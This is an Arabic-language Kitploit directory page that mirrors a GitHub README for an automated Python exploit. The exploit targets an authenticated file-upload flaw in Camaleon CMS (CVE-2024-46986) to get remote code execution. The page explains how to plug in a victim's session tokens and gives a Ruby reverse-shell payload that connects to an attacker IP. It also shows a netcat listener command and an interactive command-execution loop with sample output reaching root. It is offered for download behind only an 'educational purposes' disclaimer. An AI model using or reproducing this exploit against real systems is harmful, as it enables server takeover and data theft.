Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46986 — استغلال بايثون آلي لثغرة رفع الملفات العشوائية في Camaleon CMS (CVE-2024-46986). يدعم حمولات الشل العكسي وتنفيذ الأوامر لتنفيذ التعليمات البرمجية عن بُعد مصادق عليه. | Kitploit
أدوات/GitHubGitHub/vidura2/cve-2024-46986
الاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدتطوير الحمولات
GitHubvidura2/cve-2024-46986

CVE-2024-46986

استغلال بايثون آلي لثغرة رفع الملفات العشوائية في Camaleon CMS (CVE-2024-46986). يدعم حمولات الشل العكسي وتنفيذ الأوامر لتنفيذ التعليمات البرمجية عن بُعد مصادق عليه.

عرض المستودع
39منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-46986

استغلال Camaleon CMS - رفع ملفات تعسفي

يحتوي هذا المستودع على سكربت بايثون يقوم بأتمتة استغلال ثغرة رفع الملفات في Camaleon CMS. تسمح هذه الثغرة للمهاجم برفع ملفات تعسفية (مثل سكربتات Ruby) إلى الخادم، مما قد يؤدي إلى تنفيذ كود عن بُعد (RCE) أو تأثيرات أمنية خطيرة أخرى.

الميزات

  • استغلال رفع الملفات: رفع سكربتات Ruby خبيثة إلى الخادم المستهدف.
  • خيارات الحمولة: الاختيار بين حمولة قشرة عكسية وحمولة تنفيذ الأوامر.
  • تنفيذ أوامر متكرر: بالنسبة لحمولة تنفيذ الأوامر، يسمح السكربت للمستخدم بإدخال الأوامر بشكل متكرر.
  • أتمتة: أتمتة العملية بأكملها باستخدام مكتبة requests في بايثون.

المتطلبات الأساسية

  • بيانات اعتماد مستخدم صالحة: يلزم وجود جلسة مصادقة لكي يعمل الاستغلال. تحتاج إلى auth_token و _cms_session لمستخدم صالح.

  • Python 3.x: تأكد من تثبيت Python 3.x.

  • مكتبة في بايثون: قم بتثبيت مكتبة إذا لم تكن مثبتة بالفعل.

requests
requests
root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
استنساخ المستودع:

bash

https://github.com/vidura2/CVE-2024-46986.git cd CVE-2024-46986

تعديل السكربت:

root@kitploit:~
استبدل القيم المؤقتة your_auth_token_here و your_session_token_here و https://target_site_here في سكربت بايثون بالقيم الفعلية.
إذا كنت تستخدم حمولة القشرة العكسية، فاستبدل أيضاً your_ip و your_port بعنوان IP الخاص بك والمنفذ الذي ستقوم بإعداد مستمع عليه.

اختيار نوع الحمولة:

root@kitploit:~
القشرة العكسية: لرفع قشرة عكسية، عيّن متغير payload_type في السكربت إلى "reverse_shell".
تنفيذ الأوامر: لرفع سكربت ينفذ أوامر النظام، عيّن payload_type إلى "command_execution". ستتمكن من إدخال أوامر بشكل متكرر لتنفيذها على الخادم المستهدف.

تشغيل الاستغلال:

bash

python exploit_camaleon.py

إذا كنت تستخدم حمولة تنفيذ الأوامر، يمكنك إدخال أوامر متعددة:

bash

root@kitploit:~
Enter a system command to execute (or type 'exit' to quit): whoami
Enter a system command to execute (or type 'exit' to quit): ls
Enter a system command to execute (or type 'exit' to quit): exit

أنواع الحمولات

  1. القشرة العكسية

تُنشئ حمولة القشرة العكسية اتصالاً عكسياً بجهاز المهاجم، مما يسمح بتنفيذ كود عن بُعد على الخادم.

root@kitploit:~
قم بتعديل عنوان IP والمنفذ في سكربت Ruby داخل كود بايثون.

مثال على الحمولة:

ruby

require 'socket' s = TCPSocket.open('your_ip', your_port) while (cmd = s.gets) IO.popen(cmd, 'r') do |io| s.print io.read end end

قم بإعداد مستمع على جهازك باستخدام netcat:

bash

root@kitploit:~
nc -lvnp <your_port>

2. تنفيذ الأوامر

تقوم هذه الحمولة برفع سكربت Ruby ينفذ أوامر النظام (مثل whoami) على الخادم. يمكنك إدخال أوامر بشكل متكرر أثناء التنفيذ.

root@kitploit:~
سيواصل السكربت طلب الأوامر حتى تكتب exit.
مثال:

ruby

system("whoami")

مثال على استغلال ناجح

بمجرد تنفيذ الاستغلال بنجاح، يجب أن تشاهد مخرجات في الطرفية تشير إلى النجاح:

python

Exploit executed successfully with payload type: reverse_shell!

إذا كنت تستخدم القشرة العكسية، يجب أن يمنحك مستمع netcat إمكانية الوصول إلى قشرة الخادم المخترق.

بالنسبة لحمولة تنفيذ الأوامر:

bash

Enter a system command to execute (or type 'exit' to quit): whoami Command 'whoami' executed successfully! Response: root

إخلاء المسؤولية

هذا السكربت مخصص للأغراض التعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا الاستغلال. تأكد دائمًا من حصولك على إذن قبل اختبار أو استغلال الثغرات. المساهمة

لا تتردد في فتح المشكلات (issues) أو تقديم طلبات السحب (pull requests) للتحسينات أو الميزات الإضافية!

الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

تنزيل الأداة